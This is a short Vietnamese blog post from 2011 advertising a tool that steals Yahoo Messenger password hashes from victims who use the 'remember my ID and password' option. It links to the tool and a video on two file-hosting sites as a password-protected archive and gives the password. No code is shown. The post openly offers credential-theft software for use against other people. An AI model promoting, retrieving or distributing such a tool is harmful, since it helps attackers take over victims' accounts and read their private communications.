Yahoo Mesenger Password Hash Stolen (Y!M PHS)

2011-07-26 22:32

Yahoo Mesenger Password Hash Stolen (Y!M PHS)

Tool này dùng để trộm pass hash của Y!M khi victim sử dụng tính năng Remember my ID & password.

- Các bạn down tool và video để rõ hơn!

Download Now: (pass: choiblog.tk)
https://www.ziddu.com/download/7868532/cohd-YMPassHashStolenYMPHS.rar.html
or
https://www.4shared.com/file/141446403/34d9f371/co_hd-YM_Pass_Hash_Stolen__YM_PHS_.html